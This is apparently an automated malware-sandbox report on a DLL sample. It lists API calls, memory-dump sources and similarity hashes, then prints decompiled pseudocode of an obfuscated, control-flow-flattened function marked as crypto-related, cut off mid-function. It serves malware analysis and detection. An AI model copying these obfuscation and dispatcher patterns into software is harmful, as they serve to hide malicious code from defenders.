                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 23a04f04d67592fa4a6ac2723220beaf86df17ce3171196c27d76d8a6026fc82
                          • Instruction ID: d2dc72c21f62d634c666cfdffc927cdf1b3c803179aa5380c7816f67e05562d8
                          • Opcode Fuzzy Hash: 23a04f04d67592fa4a6ac2723220beaf86df17ce3171196c27d76d8a6026fc82
                          • Instruction Fuzzy Hash: 12E04F7028074F72FA1D5B70CD0AB9715850F95B2DF4001656B38AA8C1EFC891258C11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24F563, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,6F24F75B,?,?,?,?,?,?,00000000,?,00000000,?,?,6F2527EE,?,}&%o), ref: 6F24F57F
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: e7a6c5565e7e6dc32e93a91a790d748b33c406524ec6be92234a0235655f738e
                          • Instruction ID: 3e772c6029daf17936031e4c247add638b04ecd058c6eea66ed65e50ae0d1daa
                          • Opcode Fuzzy Hash: e7a6c5565e7e6dc32e93a91a790d748b33c406524ec6be92234a0235655f738e
                          • Instruction Fuzzy Hash: 85E0C270380B4F72FA1C5B708C0EB9719450F95B2DF0001296B38AE8C1DFC49230CC12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24FBCA, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(?,?,6F24E812,00000000,6F287FB8,0000000C,6F24E7D9,?,?,6F250599,?,?,6F25017F,00000001,00000364,?), ref: 6F24FBD9
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CriticalEnterSection
                          • String ID:
                          • API String ID: 1904992153-0
                          • Opcode ID: 27facc96418963eb903f0484bbe5ce1b39e48e1fa5f21ccd5e58bdcbca4adf43
                          • Instruction ID: 0a2f41adba61d9b3df93432ceb449cae3e393f548a3dc81c77b418505023b525
                          • Opcode Fuzzy Hash: 27facc96418963eb903f0484bbe5ce1b39e48e1fa5f21ccd5e58bdcbca4adf43
                          • Instruction Fuzzy Hash: 96B022B200030CA38F00AAAACC0E882BB0C80C02223000020F00C8B8A2CA30E3388888
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0121CF6E, Relevance: 32.4, Strings: 25, Instructions: 1116COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E0121CF6E(void* __fp0) {
				char _v12;
				signed int _v32;
				char _v36;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				char _v96;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				unsigned int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				unsigned int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				unsigned int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _t1171;
				signed int _t1199;
				void* _t1208;
				signed int _t1215;
				signed int _t1239;
				void* _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1355;
				signed int _t1361;
				void* _t1363;
				signed int _t1376;
				signed int _t1389;
				signed int _t1392;
				void* _t1394;
				void* _t1401;
				void* _t1402;
				void* _t1403;
				void* _t1408;

				_t1408 = __fp0;
				_t1394 = (_t1392 & 0xfffffff8) - 0x248;
				_v372 = 0x11a996;
				_v372 = _v372 | 0x2cdede17;
				_v372 = _v372 ^ 0x9e5241ab;
				_v372 = _v372 ^ 0xb28dbf3e;
				_v476 = 0xec8e3c;
				_t1389 = 0x3d;
				_v476 = _v476 / _t1389;
				_v476 = _v476 << 0xe;
				_t1363 = 0xf612bd7;
				_v476 = _v476 + 0x86a4;
				_v476 = _v476 ^ 0xf83106a4;
				_v552 = 0xb6fc08;
				_v552 = _v552 + 0xffff78f9;
				_v552 = _v552 >> 5;
				_v552 = _v552 + 0x964;
				_v552 = _v552 ^ 0x0005bd0c;
				_v164 = 0x6cf0cb;
				_v164 = _v164 + 0x2d38;
				_v164 = _v164 ^ 0x006e4f0a;
				_v396 = 0xca2604;
				_t1355 = 9;
				_v396 = _v396 / _t1355;
				_v396 = _v396 + 0xffff2c0a;
				_v396 = _v396 ^ 0x00191040;
				_v404 = 0xe62abf;
				_v404 = _v404 + 0x8c5;
				_v404 = _v404 ^ 0x7e28cfe8;
				_v404 = _v404 ^ 0x7ecc7d39;
				_v196 = 0xdfa594;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x0df6229b;
				_v448 = 0xa623aa;
				_v448 = _v448 + 0xfffff930;
				_v448 = _v448 + 0x5479;
				_t1244 = 0x43;
				_v448 = _v448 * 0x5e;
				_v448 = _v448 ^ 0x3d1a2986;
				_v244 = 0x6db25c;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x000d186e;
				_v252 = 0x36c35e;
				_v252 = _v252 * 0x29;
				_v252 = _v252 ^ 0x08c874ed;
				_v256 = 0x92f5ab;
				_v256 = _v256 / _t1244;
				_v256 = _v256 ^ 0x000513c4;
				_v152 = 0x624e9c;
				_v152 = _v152 ^ 0xbf8524d0;
				_v152 = _v152 ^ 0xbfe3d4e9;
				_v420 = 0x1b91b1;
				_v420 = _v420 >> 0xe;
				_v420 = _v420 ^ 0xbc11b449;
				_v420 = _v420 ^ 0xbc1940e0;
				_v428 = 0x35c239;
				_v428 = _v428 << 0x10;
				_v428 = _v428 * 0xf;
				_v428 = _v428 ^ 0x615be0e7;
				_v412 = 0xaa3e36;
				_v412 = _v412 ^ 0x4195c930;
				_v412 = _v412 + 0xffff08aa;
				_v412 = _v412 ^ 0x413d1b8a;
				_v516 = 0x4f83fe;
				_v516 = _v516 + 0x6479;
				_v516 = _v516 >> 0xd;
				_v516 = _v516 + 0x8f37;
				_v516 = _v516 ^ 0x0003a594;
				_v460 = 0x3b47a3;
				_v460 = _v460 >> 0xf;
				_v460 = _v460 << 0xa;
				_v460 = _v460 ^ 0x6bb8ccf5;
				_v460 = _v460 ^ 0x6bbe5b20;
				_v288 = 0xe83c28;
				_v288 = _v288 << 2;
				_v288 = _v288 << 0xd;
				_v288 = _v288 ^ 0x1e105215;
				_v188 = 0x7ca1e2;
				_t1245 = 0x32;
				_v188 = _v188 / _t1245;
				_v188 = _v188 ^ 0x000080c3;
				_v312 = 0xe8c502;
				_v312 = _v312 << 6;
				_t1246 = 0x14;
				_v312 = _v312 / _t1246;
				_v312 = _v312 ^ 0x02e811b7;
				_v512 = 0x506324;
				_v512 = _v512 + 0xffffa476;
				_t1239 = 0x3e;
				_v512 = _v512 / _t1239;
				_t1247 = 0x3a;
				_v512 = _v512 * 0x75;
				_v512 = _v512 ^ 0x00964a53;
				_v192 = 0xa17d2b;
				_v192 = _v192 / _t1247;
				_v192 = _v192 ^ 0x000c9c42;
				_v328 = 0xf3cb9f;
				_v328 = _v328 >> 6;
				_t1248 = 0x1c;
				_v328 = _v328 / _t1248;
				_v328 = _v328 ^ 0x00047e50;
				_v568 = 0xb4987;
				_v568 = _v568 * 0x7e;
				_v568 = _v568 + 0xffffe3e9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xe14bd941;
				_v560 = 0xec3e98;
				_v560 = _v560 ^ 0xe62f879f;
				_v560 = _v560 + 0xcd0b;
				_v560 = _v560 | 0x4c02ef5f;
				_v560 = _v560 ^ 0xeeccf5d9;
				_v200 = 0x5a6674;
				_v200 = _v200 + 0xffff99a3;
				_v200 = _v200 ^ 0x005610d4;
				_v376 = 0x951f7b;
				_v376 = _v376 + 0xffff1e6a;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0x43d62c1e;
				_v480 = 0x253370;
				_v480 = _v480 + 0xffff5e0c;
				_v480 = _v480 ^ 0x4725f15e;
				_v480 = _v480 ^ 0x431e7b32;
				_v480 = _v480 ^ 0x041a819f;
				_v488 = 0xf504e;
				_v488 = _v488 ^ 0x8afc483d;
				_t1249 = 0x78;
				_v488 = _v488 / _t1249;
				_v488 = _v488 >> 2;
				_v488 = _v488 ^ 0x004bc9c5;
				_v432 = 0x264d28;
				_v432 = _v432 + 0xffff75ed;
				_t1250 = 0x68;
				_v432 = _v432 * 0x42;
				_v432 = _v432 * 0x29;
				_v432 = _v432 ^ 0x8f2bacde;
				_v424 = 0xfb0b5a;
				_v424 = _v424 / _t1250;
				_v424 = _v424 + 0x8fe5;
				_v424 = _v424 ^ 0x000fa342;
				_v276 = 0x945485;
				_t1251 = 0x58;
				_v276 = _v276 * 0x66;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00030acd;
				_v284 = 0xfe8523;
				_v284 = _v284 + 0xffff992e;
				_v284 = _v284 * 0x3b;
				_v284 = _v284 ^ 0x3a9fc3e9;
				_v204 = 0xd03e87;
				_v204 = _v204 << 1;
				_v204 = _v204 ^ 0x01ae29a0;
				_v532 = 0xe39128;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 + 0x3850;
				_v532 = _v532 >> 9;
				_v532 = _v532 ^ 0x0003be81;
				_v484 = 0xf46b6c;
				_v484 = _v484 + 0x93dc;
				_v484 = _v484 ^ 0x38165e08;
				_v484 = _v484 << 2;
				_v484 = _v484 ^ 0xe38c7aac;
				_v508 = 0x8f3290;
				_v508 = _v508 ^ 0xa08d31a4;
				_v508 = _v508 ^ 0x86e9d3f2;
				_v508 = _v508 / _t1251;
				_v508 = _v508 ^ 0x00769529;
				_v268 = 0xbca9bd;
				_v268 = _v268 >> 9;
				_v268 = _v268 ^ 0x99e75598;
				_v268 = _v268 ^ 0x99ee6fd0;
				_v280 = 0x6eab4c;
				_v280 = _v280 * 0x70;
				_v280 = _v280 | 0x2a8368f2;
				_v280 = _v280 ^ 0x3aeb8999;
				_v336 = 0xfeaa1a;
				_v336 = _v336 + 0xc621;
				_v336 = _v336 >> 0xc;
				_v336 = _v336 ^ 0x00018288;
				_v260 = 0xb80c8c;
				_v260 = _v260 << 2;
				_v260 = _v260 + 0xffffeecc;
				_v260 = _v260 ^ 0x02ee289c;
				_v148 = 0x546f23;
				_v148 = _v148 * 0x59;
				_v148 = _v148 ^ 0x1d5187ab;
				_v468 = 0xcace2e;
				_t1252 = 0x4a;
				_v468 = _v468 * 0x32;
				_v468 = _v468 ^ 0x87ede715;
				_v468 = _v468 ^ 0x2291661e;
				_v468 = _v468 ^ 0x82ed45c4;
				_v408 = 0xc766f1;
				_v408 = _v408 + 0xffff5da0;
				_v408 = _v408 >> 8;
				_v408 = _v408 ^ 0x00014620;
				_v580 = 0xa2fcf5;
				_v580 = _v580 >> 9;
				_v580 = _v580 * 0x43;
				_v580 = _v580 >> 5;
				_v580 = _v580 ^ 0x000ed575;
				_v248 = 0xe5a82a;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x0e5339c8;
				_v400 = 0x713d32;
				_v400 = _v400 + 0xffff6125;
				_v400 = _v400 + 0xffff0e23;
				_v400 = _v400 ^ 0x006139cc;
				_v572 = 0xacbde5;
				_v572 = _v572 + 0xe14d;
				_v572 = _v572 ^ 0x7b2f3d4f;
				_v572 = _v572 ^ 0x3898bf0b;
				_v572 = _v572 ^ 0x431bbf4c;
				_v296 = 0x6dbc00;
				_v296 = _v296 / _t1252;
				_v296 = _v296 | 0x4c9f59fd;
				_v296 = _v296 ^ 0x4c974d7a;
				_v564 = 0xf21c48;
				_v564 = _v564 * 0x21;
				_v564 = _v564 + 0xffff43ae;
				_v564 = _v564 + 0xffff0e72;
				_v564 = _v564 ^ 0x1f3130a0;
				_v240 = 0x22b533;
				_v240 = _v240 << 6;
				_v240 = _v240 ^ 0x08a02ec9;
				_v500 = 0xee1ca;
				_v500 = _v500 | 0x27b7d675;
				_v500 = _v500 >> 4;
				_v500 = _v500 + 0xffff3531;
				_v500 = _v500 ^ 0x027df3d2;
				_v136 = 0xd06fa4;
				_v136 = _v136 | 0x899a4c43;
				_v136 = _v136 ^ 0x89d9d46d;
				_v316 = 0x7bf556;
				_v316 = _v316 >> 6;
				_v316 = _v316 >> 0xb;
				_v316 = _v316 ^ 0x0003a840;
				_v180 = 0xb5700b;
				_v180 = _v180 << 4;
				_v180 = _v180 ^ 0x0b5d6edd;
				_v172 = 0x6a03ff;
				_v172 = _v172 << 0xb;
				_v172 = _v172 ^ 0x501e6de0;
				_v308 = 0x3d6e99;
				_v308 = _v308 * 0x43;
				_v308 = _v308 / _t1355;
				_v308 = _v308 ^ 0x01cdbfff;
				_v264 = 0x835f1d;
				_v264 = _v264 | 0x62ba53cc;
				_v264 = _v264 >> 0xb;
				_v264 = _v264 ^ 0x000b21e3;
				_v392 = 0x508dc3;
				_v392 = _v392 | 0xc2276e42;
				_v392 = _v392 + 0x1654;
				_v392 = _v392 ^ 0xc2757b04;
				_v320 = 0xed8447;
				_v320 = _v320 ^ 0xfc5c46a3;
				_v320 = _v320 + 0x5650;
				_v320 = _v320 ^ 0xfcbce834;
				_v556 = 0xd03145;
				_t1253 = 0x49;
				_v556 = _v556 / _t1253;
				_v556 = _v556 | 0x0ddd5479;
				_v556 = _v556 << 6;
				_v556 = _v556 ^ 0x77fe9c21;
				_v384 = 0x8ac9f9;
				_v384 = _v384 | 0x5329124f;
				_t1254 = 0x6a;
				_v384 = _v384 * 0x48;
				_v384 = _v384 ^ 0x88516444;
				_v540 = 0xe81dda;
				_v540 = _v540 << 8;
				_v540 = _v540 + 0xe81d;
				_v540 = _v540 ^ 0x78e5f934;
				_v540 = _v540 ^ 0x90f96f23;
				_v588 = 0x722d3b;
				_t509 =  &_v588; // 0x722d3b
				_v588 =  *_t509 * 0xc;
				_v588 = _v588 >> 0xf;
				_v588 = _v588 / _t1254;
				_v588 = _v588 ^ 0x00023c9c;
				_v452 = 0x897595;
				_t1255 = 0x46;
				_v452 = _v452 * 0x53;
				_v452 = _v452 >> 6;
				_v452 = _v452 ^ 0xe81cb2ee;
				_v452 = _v452 ^ 0xe8a3d494;
				_v132 = 0x749bc9;
				_v132 = _v132 >> 1;
				_v132 = _v132 ^ 0x0034f746;
				_v548 = 0x689797;
				_v548 = _v548 << 7;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 | 0x00479871;
				_v548 = _v548 ^ 0x004c3178;
				_v492 = 0xc041c8;
				_v492 = _v492 / _t1255;
				_v492 = _v492 + 0x82c8;
				_v492 = _v492 * 5;
				_v492 = _v492 ^ 0x0014e5e1;
				_v128 = 0x800c65;
				_v128 = _v128 >> 0xa;
				_v128 = _v128 ^ 0x0004d6b3;
				_v436 = 0x68134;
				_v436 = _v436 >> 2;
				_v436 = _v436 >> 6;
				_v436 = _v436 * 0x3d;
				_v436 = _v436 ^ 0x000942f8;
				_v232 = 0x8f62bf;
				_v232 = _v232 << 3;
				_v232 = _v232 ^ 0x0471c0ce;
				_v168 = 0x6f60e4;
				_v168 = _v168 | 0x678a4dfc;
				_v168 = _v168 ^ 0x67e8c1e0;
				_v464 = 0x5c4f3b;
				_v464 = _v464 + 0xffffeb58;
				_v464 = _v464 + 0xffff4690;
				_v464 = _v464 ^ 0xf006e992;
				_v464 = _v464 ^ 0xf05e675b;
				_v472 = 0x63a7ce;
				_v472 = _v472 + 0xffffb0ae;
				_v472 = _v472 | 0xc9acf844;
				_v472 = _v472 + 0x7cec;
				_v472 = _v472 ^ 0xc9f46f5d;
				_v212 = 0xb59299;
				_t1256 = 0x30;
				_v212 = _v212 / _t1256;
				_v212 = _v212 ^ 0x000d972f;
				_v220 = 0xec9986;
				_v220 = _v220 | 0xfebd3f81;
				_v220 = _v220 ^ 0xfef6af3d;
				_v228 = 0x61b939;
				_v228 = _v228 + 0xffff9b04;
				_v228 = _v228 ^ 0x006f42b6;
				_v456 = 0xa85379;
				_v456 = _v456 << 6;
				_v456 = _v456 ^ 0xf657210e;
				_v456 = _v456 >> 0x10;
				_v456 = _v456 ^ 0x0000233b;
				_v184 = 0xbf357b;
				_v184 = _v184 + 0xd5a9;
				_v184 = _v184 ^ 0x00c1ae01;
				_v364 = 0x759873;
				_v364 = _v364 + 0x3a0f;
				_t1257 = 0x62;
				_v364 = _v364 / _t1257;
				_v364 = _v364 ^ 0x000baafa;
				_v348 = 0x340a53;
				_v348 = _v348 << 4;
				_v348 = _v348 ^ 0x5df0313e;
				_v348 = _v348 ^ 0x5eb5fc5e;
				_v356 = 0x866409;
				_v356 = _v356 >> 2;
				_v356 = _v356 | 0xb1cf3a2f;
				_v356 = _v356 ^ 0xb1e687e9;
				_v524 = 0x6ef5f;
				_v524 = _v524 >> 0xb;
				_v524 = _v524 | 0x9ba1c9a9;
				_v524 = _v524 + 0x1f7f;
				_v524 = _v524 ^ 0x9bab34ac;
				_v444 = 0xae3d16;
				_v444 = _v444 << 0x10;
				_v444 = _v444 | 0x8a950c76;
				_v444 = _v444 * 5;
				_v444 = _v444 ^ 0xbdf08083;
				_v360 = 0x6c9b7;
				_v360 = _v360 * 0x58;
				_v360 = _v360 ^ 0xce0d01cb;
				_v360 = _v360 ^ 0xcc5b5a40;
				_v224 = 0x5c92af;
				_v224 = _v224 * 0x32;
				_v224 = _v224 ^ 0x121610ed;
				_v160 = 0xa888fe;
				_v160 = _v160 >> 0xc;
				_v160 = _v160 ^ 0x0008bba0;
				_v272 = 0x10fba5;
				_v272 = _v272 << 5;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x04338fbd;
				_v208 = 0x364bb9;
				_v208 = _v208 ^ 0xf0900a73;
				_v208 = _v208 ^ 0xf0ad3108;
				_v352 = 0xe356a8;
				_v352 = _v352 << 6;
				_v352 = _v352 * 0xf;
				_v352 = _v352 ^ 0x548faf44;
				_v324 = 0x5222e0;
				_v324 = _v324 << 0xb;
				_v324 = _v324 | 0x9d58fcef;
				_v324 = _v324 ^ 0x9d5bfcf7;
				_v332 = 0x50ebad;
				_v332 = _v332 + 0xffff330e;
				_v332 = _v332 + 0xffff1055;
				_v332 = _v332 ^ 0x004522a1;
				_v176 = 0xd76b1e;
				_v176 = _v176 + 0xc622;
				_v176 = _v176 ^ 0x00db67cb;
				_v576 = 0xd0767c;
				_v576 = _v576 >> 5;
				_v576 = _v576 + 0x7258;
				_t1258 = 0x6c;
				_v576 = _v576 / _t1258;
				_v576 = _v576 ^ 0x000ab734;
				_v584 = 0x53ba0b;
				_v584 = _v584 | 0xe5117fb7;
				_v584 = _v584 ^ 0x3af25689;
				_v584 = _v584 << 0x10;
				_v584 = _v584 ^ 0xa9346f96;
				_v144 = 0xdc966a;
				_v144 = _v144 ^ 0x516b469a;
				_v144 = _v144 ^ 0x51bf8d99;
				_v504 = 0x4a42f6;
				_v504 = _v504 << 5;
				_v504 = _v504 >> 0xc;
				_v504 = _v504 + 0xffff0c90;
				_v504 = _v504 ^ 0xfff48b48;
				_v380 = 0xaeea44;
				_v380 = _v380 + 0xffff839e;
				_v380 = _v380 + 0xfffff37b;
				_v380 = _v380 ^ 0x00ab739d;
				_v388 = 0x13029d;
				_v388 = _v388 / _t1239;
				_v388 = _v388 / _t1389;
				_v388 = _v388 ^ 0x0006e43b;
				_v536 = 0x62890b;
				_v536 = _v536 << 5;
				_v536 = _v536 ^ 0xd2cf502c;
				_v536 = _v536 | 0xe6173c3c;
				_v536 = _v536 ^ 0xfe941178;
				_v544 = 0x3d27a3;
				_v544 = _v544 << 0xb;
				_v544 = _v544 << 0xa;
				_v544 = _v544 >> 0x10;
				_v544 = _v544 ^ 0x000e73f0;
				_v520 = 0x67dbd3;
				_v520 = _v520 + 0xffff1f9d;
				_v520 = _v520 + 0xfcaa;
				_v520 = _v520 + 0xffff7471;
				_v520 = _v520 ^ 0x006a8535;
				_v528 = 0xf1f919;
				_v528 = _v528 + 0xffff6d3c;
				_v528 = _v528 + 0xffff2741;
				_v528 = _v528 + 0x6b1d;
				_v528 = _v528 ^ 0x00f5f335;
				_v440 = 0xe7bbe6;
				_v440 = _v440 ^ 0x953d0e68;
				_v440 = _v440 + 0xf5d7;
				_v440 = _v440 ^ 0xf494f4d8;
				_v440 = _v440 ^ 0x6149c25f;
				_v416 = 0xb91207;
				_v416 = _v416 ^ 0xe5d17d0c;
				_v416 = _v416 ^ 0xe56e23fc;
				_v156 = 0x21892;
				_t1259 = 0x23;
				_v156 = _v156 / _t1259;
				_v156 = _v156 ^ 0x00005584;
				_v368 = 0xa5cd05;
				_t1260 = 0x76;
				_v368 = _v368 / _t1260;
				_v368 = _v368 << 8;
				_v368 = _v368 ^ 0x0053d1aa;
				_v340 = 0x3afddb;
				_t1261 = 0x1d;
				_v340 = _v340 / _t1261;
				_v340 = _v340 | 0x4f6e4c19;
				_v340 = _v340 ^ 0x4f6e6bc9;
				_v236 = 0xbc4ea5;
				_v236 = _v236 ^ 0x00bc4ea4;
				_v292 = 0xfa5bd7;
				_v292 = _v292 | 0xea3f92b8;
				_t1262 = 0x2b;
				_v292 = _v292 * 0x7b;
				_v292 = _v292 ^ 0xe8eebc25;
				_v300 = 0x548b90;
				_v300 = _v300 * 0x6b;
				_v300 = _v300 * 0x3c;
				_v300 = _v300 ^ 0x483be800;
				_v496 = 0xece7d5;
				_v496 = _v496 >> 6;
				_v496 = _v496 + 0xd9be;
				_v496 = _v496 + 0xffff37ae;
				_v496 = _v496 ^ 0x000e7eab;
				_v140 = 0x2687b4;
				_v140 = _v140 + 0xffffd0cd;
				_v140 = _v140 ^ 0x002be321;
				_v124 = 0x67735d;
				_v124 = _v124 * 0x5f;
				_v124 = _v124 ^ 0x266d3ba3;
				_v216 = 0x2467ab;
				_v216 = _v216 / _t1262;
				_v216 = _v216 ^ 0x000e2c9c;
				_v344 = 0xa8369;
				_v344 = _v344 ^ 0x427c8ca6;
				_v344 = _v344 + 0x153;
				_v344 = _v344 ^ 0x42766412;
				_v304 = 0x20f4f1;
				_v304 = _v304 + 0xffffc5ce;
				_t1263 = 0x53;
				_v304 = _v304 / _t1263;
				_v304 = _v304 ^ 0x00008e92;
				goto L1;
				do {
					while(1) {
						L1:
						_t1401 = _t1363 - 0xaa58334;
						if(_t1401 <= 0) {
							break;
						}
						__eflags = _t1363 - 0xe36c2d0;
						if(__eflags > 0) {
							__eflags = _t1363 - 0xf81dbfa;
							if(__eflags > 0) {
								__eflags = _t1363 - 0xf9cf312;
								if(__eflags == 0) {
									__eflags = E01222C86(_t1263, __eflags);
									if(__eflags == 0) {
										_t1363 = 0x6bdaa1b;
										goto L112;
									}
									_t1363 = 0xaa58334;
									continue;
								}
								__eflags = _t1363 - 0xfa03f19;
								if(_t1363 == 0xfa03f19) {
									E01232244();
									_t1243 = 0x27efba3;
									_push(_t1263);
									_t1361 = E01212C02(_v292, _v300);
									L78:
									_pop(_t1263);
									_t1363 = 0xaf5b09d;
									continue;
								}
								__eflags = _t1363 - 0xfe97f30;
								if(_t1363 != 0xfe97f30) {
									goto L112;
								}
								_t1171 = E012252D1();
								_t1363 = 0x6441de0;
								continue;
							}
							if(__eflags == 0) {
								_t1171 = E01232244();
								__eflags = _t1171;
								if(__eflags == 0) {
									L64:
									return _t1171;
								}
								_t1363 = 0xf7027df;
								continue;
							}
							__eflags = _t1363 - 0xe6e64c4;
							if(_t1363 == 0xe6e64c4) {
								_t1171 = E0121A92F();
								_t1363 = 0x7cc9194;
								continue;
							}
							__eflags = _t1363 - 0xe7d2485;
							if(_t1363 == 0xe7d2485) {
								_t1208 = E0122CD2C();
								_t1263 =  &_v104;
								_t1171 = E012289A2(_t1263, _v212, _t1408, _t1208, _v220, _v228, _v236, _v456,  &_v96);
								_t1394 = _t1394 + 0x18;
								asm("sbb esi, esi");
								_t1363 = ( ~_t1171 & 0xfed9fe75) + 0xe7d2485;
								continue;
							}
							__eflags = _t1363 - 0xf612bd7;
							if(__eflags == 0) {
								_t1363 = 0xf9cf312;
								continue;
							}
							__eflags = _t1363 - 0xf7027df;
							if(_t1363 != 0xf7027df) {
								goto L112;
							}
							_t1171 = E012210CD();
							__eflags = _t1171;
							if(__eflags == 0) {
								goto L64;
							}
							_t1363 = 0x1c76b4f;
							continue;
						}
						if(__eflags == 0) {
							_t1171 = E01224C20();
							__eflags = _t1171;
							if(__eflags == 0) {
								_t1171 = E0122590E();
							}
							L81:
							_t1363 = 0x8eff62f;
							continue;
						}
						__eflags = _t1363 - 0xc18aaa2;
						if(__eflags > 0) {
							__eflags = _t1363 - 0xc29a4c8;
							if(__eflags == 0) {
								_t1171 = _v340;
								_t1363 = 0x434d78a;
								_v84 = _t1171;
								continue;
							}
							__eflags = _t1363 - 0xc80f471;
							if(_t1363 == 0xc80f471) {
								_t1171 = E0121736A();
								_t1363 = 0xbef31e9;
								continue;
							}
							__eflags = _t1363 - 0xd5722fa;
							if(_t1363 == 0xd5722fa) {
								_t1215 = E012151EC( &_v36,  &_v96, _v184, _v364);
								_pop(_t1263);
								__eflags = _t1215;
								if(_t1215 != 0) {
									_t1171 = _v32;
									__eflags = _t1171 - 8;
									if(__eflags != 0) {
										__eflags = _t1171;
										if(__eflags == 0) {
											L86:
											_t1363 = 0x590cd26;
											continue;
										}
										__eflags = _t1171 - 1;
										if(__eflags != 0) {
											goto L81;
										}
										goto L86;
									}
									_t1363 = 0xa21c0cf;
									continue;
								}
								_t1171 = E01212C02(_v496, _v124);
								_t1263 = _t1263;
								_t1361 = _t1171;
								_t1243 = 0x434d78a;
								goto L81;
							}
							__eflags = _t1363 - 0xd66928b;
							if(_t1363 != 0xd66928b) {
								goto L112;
							}
							_t1171 = E0121AE43(_v104, _v144, _v504);
							goto L78;
						}
						if(__eflags == 0) {
							_t1171 = E012119C0();
							_t1363 = 0x6cb694;
							continue;
						}
						__eflags = _t1363 - 0xaf41e4a;
						if(_t1363 == 0xaf41e4a) {
							_t1171 = E0122DDA5();
							_v48 = _t1171;
							_t1363 = 0x70f7fca;
							continue;
						}
						__eflags = _t1363 - 0xaf5b09d;
						if(_t1363 == 0xaf5b09d) {
							__eflags = _t1361 - _v552;
							if(_t1361 == _v552) {
								L70:
								_t1363 = _t1243;
								goto L112;
							}
							_t1171 = E0122BDFB(_t1361, _v536, _v544, E0122CD2C());
							_pop(_t1263);
							__eflags = _t1171 - _v372;
							if(__eflags == 0) {
								_t1171 = E0122BF0C();
								goto L70;
							}
